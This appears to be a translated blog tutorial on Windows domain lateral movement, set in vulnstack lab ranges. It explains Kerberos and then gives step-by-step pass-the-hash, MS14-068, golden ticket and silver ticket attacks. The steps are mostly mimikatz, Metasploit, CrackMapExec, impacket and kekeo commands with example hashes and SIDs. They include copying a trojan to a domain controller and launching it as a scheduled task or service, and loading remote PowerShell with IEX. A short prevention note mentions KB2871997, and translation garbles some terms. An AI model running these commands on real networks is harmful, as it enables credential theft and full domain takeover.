Intranet Lateral Movement: Kerberos authentication and pass the (hash) ticket attacks

In the previous section “Intranet Lateral Movement: Obtaining a Domain’s Single-Server Password and Hash“, we talked about how to grab the host’s password and hash value during intranet penetration. After obtaining the Hash, we can crack it. If we can’t crack it, we can use them to continue to penetrate the intranet horizontally through attack methods such as PTH and PTT, which are described below.

In this section, we will explain Kerberos authentication and ticket transfer attacks in horizontal penetration. This part is very critical in intranet penetration.

Kerberos protocol authentication process
The Kerberos protocol is a computer network protocol based on a third-party trusted host. It is used to authenticate personal communications with secure means in an unsecured network. The Kerberos protocol is very important in the penetration of internal network domains. Silver bills, gold bills, and attack domain control are all inseparable from the kerberos protocol.

Key role:

  • Domain Controller (DC), referred to as DC, is a computer that realizes unified management of users and computers.
    Key Distribution Center (KDC for short) is installed in the domain controller by default, including AS and TGS.
    Authentication Service, referred to as AS, is used for KDC to authenticate Clients.
    Ticket Grantng Service, TGS for short, is used by KDC to distribute Session Key (temporary key) to Client and Server.
    Active Directory (AD for short) is used to store information about users, user groups, and domains.
    Client Client refers to the user.
    Server server, it may be a computer or a service.

An analogy: when whoami wants to communicate with bunny, whoami needs to prove to bunny that he is whoami. The direct way is to use the secret between the two as a secret key to encrypt the plaintext text to generate the ciphertext, and the ciphertext and The plaintext text is sent to bunny, and bunny decrypts the plaintext with the secret, and compares the plaintext with the plaintext. If they are consistent, it proves to be whoami.

However, in the network, ciphertext and text are likely to be stolen, and as long as there is enough time, the secret key can always be cracked. Therefore, this long-term valid key cannot be used, and it must be changed to a short-term temporary key. Then this temporary key needs to be provided by a third-party trusted organization, namely KDC (Key Distribution Center).

Let’s talk about the detailed authentication steps, roughly divided into three stages:

AS-REQ—AS-REP stage:
First, the client encrypts the timestamp, client-info, server-info and other data with its own hash value NTLM-hash, sends it to the AS, and requests a TGT ticket from the AS. (AS-REQ)

When the AS receives the information from the Client, the AS will first request the domain controller AD to ask if there is a client user. If there is, it will take out the NTLM hash of the Client and generate a random secret key called Session -Key as (temporary secret key Session-Key). And use Client NTLM-hash to encrypt Session-key as as part of the content.

Another part of the content is TGT: Use the NTLM-hash of a specific KDC account krbtgt to encrypt Session-key as, timestamp, and Client-info. Then reply these two parts to the Client. (AS-REP)

This stage is the authentication of Client and AS.

After the Client receives the AS-REP from AS, it first uses its own NTLM Hash to decrypt the Session-key as, and then uses Session-key as to encrypt Client-Info, timestamp, and Server-Info as a part, plus TGT, one And send it to TGS in KDC. (TGS-REQ)

After receiving the request, TGS uses krbtgt’s NTLM Hash to decrypt the TGT to obtain Session-key as, timestamp, and Client-info. At the same time, it uses the Session-key as decrypted by TGT to decrypt the first part of the content to obtain Client-info and timestamp. Compare the decrypted contents of the two parts to verify whether they pass. After passing, generate a new random secret key (Session-Key tgs), and reply the two parts of TGS-REP to the Client:

One part is Session-key as encrypted Session-key tgs
The other part is ST (ticket), which is the data encrypted by Server NTLM-hash (Session-key tgs, timestamp, Client-info)
This stage is the communication between Client and KDC.

AP-REQ—AP-REP phase:
After the client receives the TGS-REP, it first decrypts the Session-key tgs with the Session-key as it saved. Then use Session-key tgs to encrypt Client-info and timestamp as part of the content, and the other part is ST, which is sent to the Server together. (AP-REQ)

After receiving the AP-REQ from the Client, the server decrypts the ST with its own NTLM Hash to obtain the Session-key tgs, and then decrypts the first part with the Session-key tgs to obtain the Client-info and timestamp. Then compare with ST’s Client-info and timestamp. The timestamp is generally 8 hours. After the verification is passed, the AP-REP is returned to finally establish communication.

For details of Kerberos authentication, please see:Kerberos certification learning, which is very detailed here.

Pass the Hash and Pass the Ticket attacks

Below, we will demonstrate the method of Pass-The-Hash Attack (PTH) in the environment shown in the following figure.

As shown in the figure, on the right is an intranet environment with a domain name of god and three machines: Windows 7, Windows Server 2008, and Windows Server 2003. Both Windows 7 and Windows Server 2003 can access the Internet but do not have public IP. The attacker uses the public network VPS.

Windows Server 2008 ( is a domain controller (machine name is OWA). Assuming that our attacker has obtained control of the host of a Windows 7 domain member, we need to further penetrate into the domain to take down Windows Server 2003 and domain control.

The above experimental environment is from the vulnstack 1 shooting range. You can read my related article “A Basic Vulnstack Penetration Experience

Pass-The-Hash Attack (PTH)
Use Mimikatz for PTH
Pass The Hash is abbreviated as PTH. This method finds the password hash value (NTLM Hash) associated with the account to attack. Because in Windows systems, NTLM Hash is usually used to authenticate users who access resources, this attack can use LM HASH and NTLM HASH to directly remotely log in to the target host or reverse shell without requiring a plaintext password.

In a domain environment, users generally use a domain account when logging in to a computer. A large number of computers use the same local administrator account and password during installation. Therefore, if the computer’s local administrator account and password are also the same, an attacker can use it. Hope to pass the attack method to log into other hosts in the intranet. Using this method, the attacker does not need to spend time to blast the Hash, which is very classic in internal network penetration. Often applicable to domain/workgroup environments.

The following demonstrates the method of hash transfer attack (requires administrator rights):

First, the attacker uploads mimikatz on Windows 7, and uses mimikatz to grab Hash:


As shown in the figure above, the NTLM Hash of the domain administrator is successfully captured: 4d6e43b2cdc951808100f5b1d09aac63

Then, use mimikatz on Windows 7 to add the obtained Administrator Hash to lsass:

sekurlsa::pth /user:administrator /domain:workgroup /ntlm:4d6e43b2cdc951808100f5b1d09aac63

If successful, a new shell will automatically pop up at this time. At this time, to access the remote host or service, there is no need to provide a clear text password. As follows, we list the C drive directory of the domain controller OWA:

We can also copy the msf Trojan to the domain controller and set up scheduled tasks or create services to execute:

copy bindshell.exe \\OWA\c$        // Copy msf trojan bindshell.exe to the target machine

schtasks /create /tn "shell" /tr C:\bindshell.exe /sc MINUTE /s                // Create a shell scheduled task on the domain controller, and start bindshell.exe under the c drive at boot

schtasks /run /s /i /tn "shell"      // Start the scheduled task immediately on the domain controller

sc \\OWA create bindshell binpath= "c:\bindshell.exe"    // Create a service startup Trojan on the domain controller

sc \\OWA start bindshell     // Start the service immediately on the domain controller

Note that the following points should be paid attention to in the hash transfer attack:

The host name must be used after the dir command, not the IP, otherwise an error will be reported
Use mimikatz for hash transfer to have local administrator rights
Use Metasploit for PTH
Three frequently used modules

auxiliary/admin/smb/psexec_command      // Execute system commands on the target machine             
exploit/windows/smb/psexec            // Execute system commands with psexec        
exploit/windows/smb/psexec_psh         // Use powershell as the payload

Take exploit/windows/smb/psexec module hash transfer attack Windows Server 2003 as an example (set smbuser, smbpass, smbdomain)

As you can see, this module can only use windows/meterpreter/reverse_tcp as the payload by default, which is a reverse shell. This also determines that the target host (Windows Server 2003) of our hash transfer attack must be able to access the Internet. .

use exploit/windows/smb/psexec
set rhosts
set smbuser administrator
set smbpass 00000000000000000000000000000000:4d6e43b2cdc951808100f5b1d09aac63  # Hash of the complete Administrator user
set smbdomain god

As shown above, the attack was successful and the shell of Windows Server 2003 was obtained. Note that the smbpass option here can be a plaintext password or a Hash, but the Hash must be complete. If you don’t know the previous LM Hash part, you can replace it with 0 as above. Don’t forget to set up a route or proxy to the intranet.

Use Crackmapexec for PTH
This tool is located on Kali, which can perform batch PTH attacks on C segment hosts.

Download link:

You can install it directly with apt-get on kali:

apt-get install crackmapexec

The commands for PTH on the intranet host are as follows:

crackmapexec smb IP -u user -H hash -d -x whoami
crackmapexec smb -u administrator -H 4d6e43b2cdc951808100f5b1d09aac63 -d -x whoami

IP It can be a single IP or an IP segment
-u Specify username
-H Specify NTLM Hash
-d Designated domain
-x Execute system commands

For more use of crackmapexec, please refer to:

CrackMapExec: The Swiss Army Knife in Domain Environment Penetration

Test tool-CrackMapExec-remotely execute Windows commands

Use wmiexec for PTH
1. Python version (

This is the script in the impacket toolkit. It can be used for PTH. It is very powerful and can use the socks proxy.

Download link:

First, the attacker installs the impacket toolkit:

git clone
cd impacket/
pip install .

Enter the examples directory to find our, and then execute

(proxychains4) python -hashes LM Hash:NT Hash Domain name/user name@ "command"

python -hashes 00000000000000000000000000000000:4d6e43b2cdc951808100f5b1d09aac63 god/administrator@ "whoami"

2. wmiexec.exe

Download link:

The exe version is the same as the above, which is implemented through the python impacket library, and the usage is the same, so it will not be demonstrated again.

3. Powershell version

Download link:

The Invoke-TheHash project is an attack kit based on .Net TCPClient that passes NTLM hash to the NTLMv2 authentication protocol for authentication, and the client does not need local administrator permissions when executing. Contains the following scripts:


It can execute WMI and SMB commands, and perform PTH attacks on intranet IP in batches. Usage: execute the following on the powershell of the target host Windows 7:

IEX (New-Object Net.WebClient).DownloadString('');

IEX (New-Object Net.WebClient).DownloadString('');
Invoke-TheHash -Type WMIExec -Target -Domain god -Username administrator -Hash 4d6e43b2cdc951808100f5b1d09aac63
 -Command "whoami" -verbose
  • -Target :Target host name or IP address/segment.
    -Username: The username used for authentication.
    -Domain: The domain used for authentication. This parameter is not required for local accounts or when using @domain after the username.
    -Hash: NTLM password hash used for authentication (format: LM:NTLM or NTLM).
    -Command: The command executed on the target. If the command is not specified, it will check whether the username and hash can access the SCM on the target.

When using it, you need to load the Invoke-WMIExec.ps1 script first, and then load the Invoke-TheHash.ps1 script, because the Invoke-WMIExec method is used in Invoke-TheHash.

As shown in the figure above, the command was successfully executed on other hosts in the batch intranet. As follows, we start the notepad process on the domain controller (

Go to the domain controller to view the 3336 process:

It can be seen that the process started successfully.

Prevention of pass-the-hash attacks
Hit the kb2871997 patch. After the patch is applied, it will be forbidden to connect to the remote host through the local administrator authority. As a result, it is impossible to use PsExec, WMI, smbexec, schtasks, sc, etc. on the remote computer through the local administrator authority, and cannot access the file sharing of the remote host.

However, in the test, it was found that after the patch kb2871997, the conventional hash transfer could not be successful, except for the default Administrator (SID 500) account, which can still be used for hash transfer.


Pass The Ticket Attack (PTT)

The PTH we talked about above is based on NTLM authentication. Next, the PTT we are going to talk about is based on the Kerberos protocol. The Kerberos protocol has been discussed at the beginning of the article. Please be sure to understand the mystery carefully!

In our penetration test, in order to use the hash pass attack, we must obtain the administrator rights of the target machine. If you don’t have administrator rights, we might as well use PTT.

In the Pass The Ticket Attack (PTT), we commonly use MS14-068, gold bills, and silver bills. Among them, MS14-068 can be used to horizontally obtain the authority of the host in the domain, and the gold bill and silver bill can be used to maintain the authority of the domain controller.

Let’s reproduce the specific operation of the PTT attack in the experimental environment in the above figure. On the right is the target intranet, the domain name is demo, Windows 7 is a common user douser, and the password is Dotest123, and DC is the domain administrator administrator user. Assuming that we have used msf to gain control of Windows 7 and have entered the target intranet through routing or proxying, we need to use PTT attacks to take down DC.

The above experimental environment comes from the vulnstack 4 shooting range, you can read my related article to record a Vulnstack shooting range intranet penetration (2)

Before explaining MS14-068, we must first understand the PAC. PAC is used to verify the client’s access rights. It will be placed in the TGT and sent to the Client, and then sent by the Client to the TGS.

In the process of using the Kerberos protocol in the Windows domain, in order to allow the server to determine whether the Client has the authority to access the service, Microsoft has made some extensions to the Kerberos protocol on the Windows platform, that is, the PAC (Privilege Attribute Certificate) and privileged attribute certificate are added to the protocol. That is, this PAC caused the MS14-068 vulnerability.

MS14-068 is a Windows vulnerability in the Key Distribution Center (KDC) service. It allows authenticated users to insert arbitrary PACs (a structure that represents all user permissions) in their Kerberos tickets (TGT). The vulnerability is located in the Key Distribution Center (KDC) of the kdcsvc.dll domain controller. Ordinary users can obtain a ticket by presenting a Kerberos TGT with a changed PAC, and then forge the ticket to obtain administrator rights.

After understanding the principle of the vulnerability, we will demonstrate how to exploit the vulnerability. The required conditions are as follows:

  • SID of any user in the domain
    Any user password in the domain

Use MS14-068 tools

First, we need to obtain the SID of a domain user douser on the target host Windows 7:

The SID is: S-1-5-21-979886063-1111900045-1414766810-1107

Then upload the tool ms14-068.exe in Windows 7, and execute the following command to generate TGT ticket:

ms14-068.exe -u -s S-1-5-21-979886063-1111900045-1414766810-1107 -d -p Dotest123

ms14-068.exe -u Domain member name@domain name -s domain member sid -d domain controller ip address -p domain member password

As shown in the figure above, the ticket file named is successfully generated. The next thing to do is to inject the ticket file into the memory of Windows 7:

Upload mimikatz on Windows 7, and use mimikatz to inject the ticket into the current memory to forge the credentials:

mimikatz # kerberos::purge         //Clear all certificates in the current machine. If there are domain member certificates, it will affect the forgery of certificates
mimikatz # kerberos::list          //View current machine credentials
mimikatz # kerberos::ptc ticket file   //Inject the ticket into memory

Check whether the injection is successful klist:

As shown in the above figure, the ticket injection is successful. At this time, the attacker can use Windows 7 to access all machines in the domain at will, and can use net use to log in or use psexec, wmi and other methods to execute commands remotely. For example, use net use to log in to the domain controller (WIN-ENS2VR5TR3N):

net use \\WIN-ENS2VR5TR3N

As shown in the figure above, you have successfully logged into the domain controller and listed the C drive directory of the domain controller. At this time, if we want to control the domain controller, we have to upload a positive msf horse on Windows 7 and copy the Trojan to the domain controller for execution:

copy c:\windows\system32\bind.exe \\WIN-ENS2VR5TR3N\c$

Then create a service to the domain controller remotely via sc on Windows 7 to start the Trojan:

sc \\WIN-ENS2VR5TR3N create bindshell binpath= "c:\bind.exe"
sc \\WIN-ENS2VR5TR3N start bindshell

After execution, the msf on the attacker successfully went online to the domain controller:

Successfully won domain control.

Use kekeo tool

Download link:

Kekeo is an open source tool of gentilkiwi, and we can also use it to implement ticket delivery.

Because we need to get the NTLM Hash of the domain user, we get the hash of the douser user:

Get the hash as: bc23b0b4d5bf5ff42bc61fb62e13886e

Then upload kekeo on the target machine Windows 7 and execute the following command to generate a ticket:

kekeo     // Enter kekeo
kekeo # tgt::ask /user:douser / /ntlm:bc23b0b4d5bf5ff42bc61fb62e13886e
// tgt::ask /user: username /domain:domain name /ntlm:NTLM Hash

As shown in the figure above, the ticket file named is successfully generated, and the next step is to import the ticket:

Execute the following commands in kekeo:
kekeo # kerberos::purge        // Clear other tickets in memory
kekeo # kerberos::ptt     // Import tickets

As shown in the figure above, the import is successful. Enter “exit” to exit kekeo. At this time, the attacker can use Windows 7 to access all machines in the domain at will, and can log in using net use or use psexec, wmi and other methods to execute commands remotely. The operation is the same as above, no demonstration.

Golden ticket
During the kerberos authentication process of Windows, the client sends its own information to the KDC, and then the KDC uses the Hash of the krbtgt user as a key for encryption to generate a TGT. So if the Hash value of krbtgt is obtained, can’t you forge any tgt? Because krbtgt is only available on domain controllers, using golden credentials means that you have obtained domain controller permissions before, and golden credentials can be understood as a backdoor.

Let’s assume this situation. All account hashes in the domain, including the account krbtgt, have been previously obtained. For some reasons, your domain management authority has been lost, but fortunately, you still have a normal domain user authority. It happens that the administrator is in Forgetting to reset the krbtgt password during the hardening of the domain, based on this condition, we can use the ticket to regain the domain administrator authority, and use the HASH value of krbtgt to forge and generate any TGT (mimikatz), which can bypass the account policy for any user , Let users become members of any group, can be used for any service of Kerberos authentication.

When attackers use gold bills to carry out bill delivery attacks, they usually need to master the following information:

Need to fake domain administrator username
Full domain name
Domain SID
NTLM Hash of krbtgt

Domain member host: Windows 7 ( 
User name:douser

Domain Controller:
Domain name:
Username: administrator

First, we log on to the domain controller, upload mimikatz, and then execute the following command to grab the Hash value of the krbtgt user and obtain the domain sid:

lsadump::lsa /patch        // Dedicated to export user passwords or hashes on domain controllers

The Hash of the krbtgt user is: 7c4ed692473d4b4344c3ba01c5e6cb63, and the domain sid is S-1-5-21-979886063-1111900045-1414766810

Then, we switch to the Windows 7 machine of an ordinary domain user, and use mimikatz to generate a TGT credential named ticket.kirbi, and the user name is administrator:

kerberos::golden /user:administrator / /sid:S-1-5-21-979886063-1111900045-1414766810 /krbtgt:7c4ed692473d4b4344c3ba01c5e6cb63 /ticket:ticket.kirbi

kerberos::golden /user:The username of the domain administrator that needs to be forged / /sid:domain sid /krbtgt: Hash of the krbtgt user /ticket:ticket.kirbi

The TGT certificate ticket.kirbi is successfully generated, named ticket.kirbi, and then use mimikatz to inject the certificate ticket.kirbi into it:

kerberos::ptt ticket.kirbi
kerberos::ptt <Ticket File>

At this point, if you look at the ticket in the current session, you can find that the ticket you just injected is in it:


At this point, the injection is successful. Enter “exit” to exit mimikatz. At this time, the attacker can use Windows 7 to access the domain control at will, and log in with net use

dir \\WIN-ENS2VR5TR3N\c$

You can also use psexec, wmi and other methods to execute commands remotely. The specific operation will not be demonstrated. Compared with ms14-068, the golden ticket can be used as a backdoor connected to the domain controller on the host of a common domain member.


Silver ticket
Silver bills are different from gold bills. The process of using silver bills is to forge TGS and generate a TGT that can access the service through a known authorization service password. Because there is no need to use the KDC in the ticket generation process, the domain controller can be bypassed, leaving few logs. The TGT is issued by the KDC during the use of the gold bill, and within 20 minutes of generating the forged TGT, the TGS will not verify the authenticity of the TGT.

Silver notes rely on the password hash value of the service account, which is different from the password hash value of the krbtgt account required to use the gold note, so it is more hidden.

If an attacker wants to use silver bills to carry out bill delivery attacks, he needs to master the following information:

domain name
Domain SID
FQDN of the target server
Available services
NTLM Hash of the service account
Username to fake

As follows, we use silver bills to forge CIFS service permissions. CIFS services are usually used for file sharing between Windows hosts.

First, log in to the domain controller and grab the hash of the machine account:


The hash of the computer account is: f0954d00b21d338aa86051eca90f7f74

(Note that it is the NTLM-Hash of the WIN-ENS2VR5TR3N$ user, not the Administrator user, because the shared service account is used)

Then switch to the ordinary domain user’s machine Windows 7 and use mimikatz to generate forged silver bills:

kerberos::golden / /sid:S-1-5-21-979886063-1111900045-1414766810 / /rc4:f0954d00b21d338aa86051eca90f7f74 /service:cifs /user:douser /ptt

/sid: SID value of the domain
/rc4: the hash of the server machine
/service: Available services, here is cifs
/user: username to be forged, fill in arbitrarily
/target: domain controller name, that is, FQDN (full name)

A forged silver bill is successfully generated, and authorization verification is performed at this time. As follows, it is found that the shared directory of the domain controller can be accessed:

dir \\\c$         // The machine name should be the full name, pay attention to the full name

The hash transfer and bill transfer attacks discussed in this article are very basic skills in the lateral movement of intranet penetration, but they are crucial. In the future study, we can’t go far, we must learn the basic things well, lay a solid foundation, and move forward step by step.



There are no reviews yet.

Be the first to review “Intranet Lateral Movement: Kerberos authentication and pass the (hash) ticket attacks”

Your email address will not be published. Required fields are marked *